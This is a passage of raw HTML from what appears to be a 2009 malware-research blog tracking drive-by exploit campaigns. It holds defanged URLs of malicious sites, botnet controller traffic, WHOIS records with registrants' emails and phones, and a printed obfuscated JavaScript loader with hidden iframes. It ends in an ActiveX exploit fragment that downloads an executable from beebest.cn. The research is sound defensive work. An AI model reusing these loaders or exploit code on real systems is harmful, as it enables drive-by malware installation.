/>hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/team.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=022ec04155a750ee3f480d2f85791fc7&t=1240189403&type=js" target="_blank">Analysis</a><br /><br />Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://77.221.133.172/.if/go.html?<br />hxxp://by.ru/info/?where <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/wallz.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=713f99048cdb15abc6d8d4362f64dc89&t=1240189401&type=js" target="_blank">Analysis<br /><br /></a>Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html<br />hxxp://by.ru/info/?where<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/live/index2.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=ecbd15e4abab1929620bc7ce8baa6226&t=1240189400&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://utevox.site90.com/f/index.php<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html<br /></td></tr></table><br /><br /><a href="http://wepawet.iseclab.org/view.php?hash=cf17de61655dcbbe49b2b156a4657ef8&t=1240189397&type=js" target="_blank">Analysis</a><p>Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=af2a41a9e85c52ff2296499b78cacdd7&t=1240189395&type=js" target="_blank">Analysis</a></p><p> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="441" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="437" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=3f78714d6c50cff7fb1bd7cd83ab2101&t=1240189392&type=js" target="_blank">Analysis</a></p><p>On this page the domain appears to be previously involved in the Asprox malware campaign. As you can see the fgg.js and script.js are still present on the page.<br /><br />However all of these are not responding.</p><p><a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2002" target="_blank">Finjan report</a><br /><a href="http://www.google.com/search?q=%22fgg.js%22&hl=en&rlz=1G1GGLQ_ENBE320&start=10&sa=N" target="_blank">Google Searchfor fgg.js</a><br /><a href="hxxp://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENBE320&q=www.netcfg9.ru&btnG=Google+Search&aq=f&oq=" target="_blank">Google Search for www.netcfg9.ru</a><br /></p><p> hxxp://www.jve4.ru/fgg.js <br /> hxxp://www.nmr43.ru/fgg.js <br /> hxxp://www.mj5f.ru/script.js <br /> hxxp://www.vswc.ru/script.js<br /> hxxp://www.pkseio.ru/script.js <br /> hxxp://www.4log-in.ru/script.js <br /> hxxp://www.netcfg9.ru/script.js <br /> hxxp://www.sitevgb.ru/script.js<br /> hxxp://www.errghr.ru/script.js <br /> hxxp://www.81dns.ru/script.js <br /> hxxp://mixbunch.cn/thread.html <br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4 <br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html <br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn-EpxX4MQU-IHrc2cXbLgz5BciZI5aXzSWDvH42xhlZ0QtQJLS9HoH6Ji99u30TeLuVTzYgChHKHt-fz-RkZ4Dyhyphenhyphenhq7OtQHDBa_j_dGXh89FP1smwJ7FyFBw4tZnITTbZeffNR5pSoFk/s1600-h/image1.html-Asprox.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 300px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn-EpxX4MQU-IHrc2cXbLgz5BciZI5aXzSWDvH42xhlZ0QtQJLS9HoH6Ji99u30TeLuVTzYgChHKHt-fz-RkZ4Dyhyphenhyphenhq7OtQHDBa_j_dGXh89FP1smwJ7FyFBw4tZnITTbZeffNR5pSoFk/s320/image1.html-Asprox.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698005512053042" /></a><br /></p><p>************<br />Infected page: </p><p>hxxp://tochtonenado.com/yes/index.php<br /> hxxp://tochtonenado.com/yes/load.php?stat=Windows</p><p><a href="hxxp://wepawet.cs.ucsb.edu/view.php?type=js&hash=bc2e9aa85b7f80634e5b7e5df0e76324&t=1238341867" target="_blank">Analysis</a><br /><br />Trojan Waledac.GEN</p><p><a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c" target="_blank">Anubis Report</a></p><p>Botnet Controller</p><p> 89.149.244.140:80 - [djbobroff.ru] <br /> Request: GET /spm/index.php?id=584E5E43 <br /> Response: 200 "OK" <br /> Request: GET /spm/index.php?id=584E5E43&download=0000138F <br /> Response: 200 "OK" <br /> Request: POST /spm/index.php?id=584E5E43&mid=5007 <br /> Response: 200 "OK" <br /><br /> C:\WINDOWS\system32\DRIVERS\asyncmac.sys<br /></p><p>*****************</p><p> Exploits:<br /></p><table width="430" border="0" cellspacing="0" cellpadding="0"><tr><td width="269">hxxp://5rublei.com/unique/index.php</td><td width="161"><a href="http://wepawet.iseclab.org/view.php?hash=1caa44fb445de12a00abd26402ae5d28&t=1240188306&type=js" target="_blank">Analysis</a> - <a href="http://www.virustotal.com/analisis/eee1d92f291ebf12eb9a648d5bff3e1c" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c" target="_blank">Anubis</a></td></tr><tr><td>hxxp://bizoplata.ru/ballast.html</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=19f8e2944f3848c2b9980020300952db&t=1240264005&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/courier.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=93cc42c58cbe763222e43fa8f6375023&t=1239920723&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/pay.html?</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=38182f76de5bcf5d090cdd9b36424d74&t=1240263970&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/post.html</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&t=1239390474&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://dasretokfin.com/load.php</td><td><a href="http://jsunpack.jeek.org/dec/go?url=dasretokfin.com_load.php" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/thread.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/golf.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=a89ecbd89cd1fd83341ebbfe467dca53&t=1240199761&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/bowling.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=022e3c32f124fd0c0e50939b5399a6f8&t=1240250684&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://peskufex.cn/ss/in.cgi?2</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&t=1239390474&type=js" target="_blank">Source</a></td></tr><tr><td>hxxp://startdontstop.ru/bigmac.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=add37e12cc791e69d3e0670f58f39901&t=1239890697&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://sunmaiamibich.ru/pupu/in.php</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628" target="_blank">Analysis</a></td></tr><tr><td>hxxp://sunmaiamibich.ru/pupu/load.php</td><td><a href="http://www.virustotal.com/analisis/2bab5a949c6e83dba25eb4bda2b90493" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19f86524a316a29d4e9dfd0d992132ee9" target="_blank">Anubis</a></td></tr><tr><td>hxxp://tixwagoq.cn/in.cgi?4</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=8717fc57e750e4948877ea1496eeebe0&t=1240264417&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/index.php </td><td><a href="http://wepawet.iseclab.org/view.php?hash=bc2e9aa85b7f80634e5b7e5df0e76324&t=1238341867&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/load.php</td><td><a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c&format=html" target="_blank">Anubis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/include/spl.php</td><td><a href="http://wepawet.iseclab.org/view.php?hash=256e6b1f2bb2984111f9a742fc768806&t=1240264874&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://utevox.site90.com/f/index.php</td><td><a href="http://jsunpack.jeek.org/dec/go?url=utevox.site90.com_f_index.php" target="_blank">Analysis</a></td></tr><tr><td>hxxp://utevox.site90.com/f/load.php</td><td>dead</td></tr></table><p><br /> 91.212.41.91<br /></p><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="28">hxxp://<span class="scam_website">mixbunch.cn</span><br /> hxxp://<span class="scam_website">sunmaiamibich.ru</span></td></tr></table><br />91.212.65.7<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="14">hxxp://<span class="scam_website">peskufex.cn</span></td></tr></table><br />95.129.144.228<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="42">hxxp://<span class="scam_website">5rublei.com</span><br /> hxxp://<span class="scam_website">dasretokfin.com</span><br /> hxxp://<span class="scam_website">tochtonenado.com</span></td></tr></table><br />95.129.144.13<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">bizoplata.ru</span><br /> hxxp://<span class="scam_website">startdontstop.ru</span><br /></td></tr></table><p>64.235.52.170<br /></p><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">utevox.site90.com</span><br /></td></tr></table><br />************************<br /><br />Domain Name: <span class="scam_website">mixbunch.cn</span><br />ROID: 20081108s10001s82359461-cn<br />Domain Status: clientTransferProhibited<br />Registrant Organization: Raymond Keaton <br />Registrant Name: Raymond Keaton<br />Administrative Email: Keaton@cybernauttech.com<br />Sponsoring Registrar: 广东时代互联科技有限公司<br />Name Server:ns1.softwaresupport-group.com<br />Name Server:ns2.softwaresupport-group.com<br />Registration Date: 2008-11-08 16:06<br />Expiration Date: 2009-11-08 16:06<br /><br />domain: <span class="scam_website">sunmaiamibich.ru</span><br />type: CORPORATE<br />nserver: ns1.softwaresupport-group.com.<br />nserver: ns2.softwaresupport-group.com.<br />state: REGISTERED, DELEGATED<br />person: Private person<br />phone: +7 910 3478712<br />e-mail: dmitrijstanislavskij@yandex.ru<br />registrar: REGRU-REG-RIPN<br />created: 2009.04.16<br />paid-till: 2010.04.16<br />source: TC-RIPN<br /><br />Domain Name: <span class="scam_website">peskufex.cn</span><br />ROID: 20090315s10001s50367993-cn<br />Domain Status: clientDeleteProhibited<br />Domain Status: clientTransferProhibited<br />Registrant Organization: 永也进出口公司<br />Registrant Name: 张龙<br />Administrative Email: alvin_555@yeah.net<br />Sponsoring Registrar: 易名中国<br />Name Server:ns2.dnsmytruedns.com<br />Name Server:ns1.dnsmytruedns.com<br />Registration Date: 2009-03-15 15:37<br />Expiration Date: 2010-03-15 15:37<p>Domain Name: <span class="scam_website">5rublei.com</span><br />Registrar: BIZCN.COM, INC.<br />Whois Server: whois.bizcn.com<br />Referral URL: http://www.bizcn.com<br />Name Server: NS1.EVERYDNS.NET<br />Name Server: NS2.EVERYDNS.NET<br />Name Server: NS3.EVERYDNS.NET<br />Name Server: NS4.EVERYDNS.NET<br />Status: clientDeleteProhibited<br />Status: clientTransferProhibited<br />Updated Date: 31-mar-2009<br />Creation Date: 30-jun-2008<br />Expiration Date: 30-jun-2010<br /><br />Domain Name: <span class="scam_website">dasretokfin.com</span><br />Registrar: REGTIME LTD.<br />Whois Server: whois.regtime.net<br />Referral URL: http://www.webnames.ru<br />Name Server: NS1.AFRAID.ORG<br />Name Server: NS2.AFRAID.ORG<br />Name Server: NS3.AFRAID.ORG<br />Name Server: NS4.AFRAID.ORG<br />Status: ok<br />Updated Date: 24-mar-2009<br />Creation Date: 18-feb-2009<br />Expiration Date: 18-feb-2010<br /><br />Domain Name: <span class="scam_website">tochtonenado.com</span><br />Registrar: UK2 GROUP LTD.<br />Whois Server: whois.hostingservicesinc.net<br />Referral URL: http://www.uk2group.com/<br />Name Server: NS1.EVERYDNS.NET<br />Name Server: NS2.EVERYDNS.NET<br />Name Server: NS3.EVERYDNS.NET<br />Name Server: NS4.EVERYDNS.NET<br />Status: clientTransferProhibited<br />Updated Date: 25-mar-2009<br />Creation Date: 25-mar-2009<br />Expiration Date: 25-mar-2010<br /><br />domain: <span class="scam_website">bizoplata.ru</span><br />type: CORPORATE<br />nserver: ns1.sevensearchon.ru<br />nserver: ns2.sevensearchon.ru<br />state: REGISTERED, DELEGATED<br />person: Private Person<br />phone: +7 495 0000000<br />e-mail: tuhov83@mail.ru<br />registrar: CT-REG-RIPN<br />created: 2009.01.23<br />paid-till: 2010.01.23<br />source: TC-RIPN<br /><br />domain: <span class="scam_website">startdontstop.ru</span><br />type: CORPORATE<br />nserver: ns1.sevensearchon.ru.<br />nserver: ns2.sevensearchon.ru.<br />state: REGISTERED, DELEGATED<br />person: Private Person<br />phone: +7 916 7843219<br />e-mail: ale32888049@yandex.ru<br />registrar: NAUNET-REG-RIPN<br />created: 2009.04.14<br />paid-till: 2010.04.14<br />source: TC-RIPN<br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-41824749533840587652009-04-17T10:15:00.000-07:002009-04-19T14:14:40.949-07:00Black Hat SEO - RBN Hacks, p.3<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="502" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br /> Triple threats<br /></p><table width="488" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="488"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) <br /> which lead to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><p>The story about <i>"Hosted JavaScript leading to .cn PDF Malware"</i> which has implicated <span class="scam_website">clarafin[.]info</span>, <span class="scam_website">fabiomotor[.]cn</span> and <span class="scam_website">letomerin[.]cn</span> continue!<br /> <br />New sites appear as intermediaries for distributing malware.<br /><hr />About <span class="scam_website">beebest[.]cn</span> I will take this domain for example "cmizziconstruction.com"<br /><br /><a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=cmizziconstruction.com" target="_blank">The Diagnostic page for cmizziconstruction.com</a>. (Provided by Google Safe Browsing)<br /><br /> In the source code we can see:<br /><br /><table width="206" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="10544" height="404" style="padding:10px"><script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d<br />2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()<br />));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){<br />var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49<br />d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43<<br />h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647<br />24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst<br />r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36=''<br />;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628<br />216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+<br />r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027<br />'+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366<br />5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'<br />332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+<br />'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253<br />7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36<br />+'392532652536332536662536642532662536392536652532652537'+r36+'302<br />536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34<br />2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346<br />42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536<br />6625366425323825323925326125333425333125333125333325333825323925<br />3262253237'+r36+'253334253338253336253338253636253336253336253237'<br />+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364<br />253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363<br />82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'<br />342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253<br />7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925<br />3361253638253639253634253634253635253665253237'+r36+'253365253363<br />2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29<br />293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27<br />'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3<br />64714d7(h49d2e36474be1));</script></td></tr></table><p>The deobfuscated code is<br /><br /><table width="477" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="475" height="174" style="padding:10px"><script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%<br />20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7<br />4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%<br />6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f<br />%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%<br />2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2<br />0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d<br />%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%<br />6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72<br />%61%6d%65%3e'));}var myia=true;</script><br /></td></tr></table><p>which is an IFRAME</p><table width="200" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="459" height="65" style="padding:10px"><iframe name=c27 src='hxxp://<span class="scam_website">extraspray.com</span>/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe></td></tr></table><p><u>Analysis on March 25</u> <br /></p><table width="487" border="0" cellspacing="0" cellpadding="0"><tr><td width="281" height="28">hxxp://<span class="scam_website">extraspray.com</span>/in.php?<br /></td><td width="206"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&t=1238026597&type=js" target="_blank">URL Analysis</a></td></tr><tr><td height="40" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/getexe.exe<br />?o=7&t=1238025784&i=2154770527&e=<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="36" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x19.php<br />?o=7&t=1238025784&i =2154770527<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="35" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x18.php<br />?o=7&t=1238025784&i=2154770527<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="31" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x21x1.php<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="35" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/getexe.exe<br />?o=4&t=1238025787&i=2154770527&e=</td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="31" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC">hxxp://<span class="scam_website">rifnasax.cn</span>/nuc/exe.php</td><td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d52f9efb85ed74924aad6cd64720d575&t=1237274961" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/82335932d790a3f0073266d648527e75" target="_blank">VirusTotal</a> (Kryptik)</td></tr></table><p><u>Analysis on April 17 </u></p><table width="487" border="0" cellspacing="0" cellpadding="0"><tr><td width="282" height="24">hxxp://<span class="scam_website">extraspray.com</span>/in.php?<br /></td><td width="205"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&t=1239979475&type=js" target="_blank">URL Analysis</a></td></tr><tr><td height="47" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/getexe.exe<br />?o=7&t=1239978315&i=2154770527&e=<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="39" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/exploits/x19.php<br />?o=7&t=1239978315&i=2154770<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="38" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/exploits/x18.php<br />?o=7&t=1239978315&i=2154770527<br /></td><td style="border-top:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&t=1239979751&type=js" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank">Anubis</a></td></tr><tr><td height="37" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/getexe.exe<br />?o=7&t=1239978315&i=2154770527&e=18<br /></td><td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&t=1239979751&type=js" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank">Anubis</a></td></tr></table><br /><p><br />Now with <span class="scam_website">clarafin[.]info</span><br /><br /><a href="http://wepawet.cs.ucsb.edu/view.php?hash=3ec2e92d7f43a9af31325c7609a5d43c&t=1239978396&type=js" target="_blank">Analysis on April 17 (07:26) </a><br /><br /> The source code show:<br /></p><table width="462" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="460" height="174" style="padding:10px"><script>if (!myia){<br />document.write(unescape('<br />%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%<br />32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c<br />%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%<br />66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d<br />%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%<br />72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29<br />%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%<br />77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7<br />4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73<br />%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%<br />3e%3c%2f%69%66%72%61%6d%65%3e'));<br />}<br />var myia = true;<br /></script><br /></td></tr></table><p> which is the IFRAME for <span class="scam_website">clarafin[.]info</span><br /></p><table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="448" height="90" style="padding:10px"><iframe name=c32 src='hxxp://<span class="scam_website">clarafin.info</span>/traff/index.php?'+Math.round(Math.random()<br />*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'><br /> </iframe><br /></td></tr></table><br />You can follow the result for "<span class="scam_website">clarafin.info</span>" on this page: <br /><a href="http://isc.sans.org/diary.html?storyid=6178" target="_blank" style=" color:#000">Internet Storm Center: Hosted javascript leading to .cn PDF malware</a> <br /><br />-------------<br /><br /><p> And now the new one who just appear on the same page: beebest[.]cn<br /><br /><a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=beebest.cn" target="_blank" style="color:#000">Google Diagnosting for beebest.cn</a> AS41665 (HOSTING)<br /><br />This is just a part of the code:<br /></p><table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="448" height="450" style="padding:10px"><p> function ss()<br />{<br />try{<br />ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");<br />var arbitrary<br />_file = "<b>hxxp://beebest.cn/dlutrl23dnwfas/exe.php</b>";<br />var dest = 'C:/Program Files/Outlook Express/wab<br />.exe';<br />document.write("<object 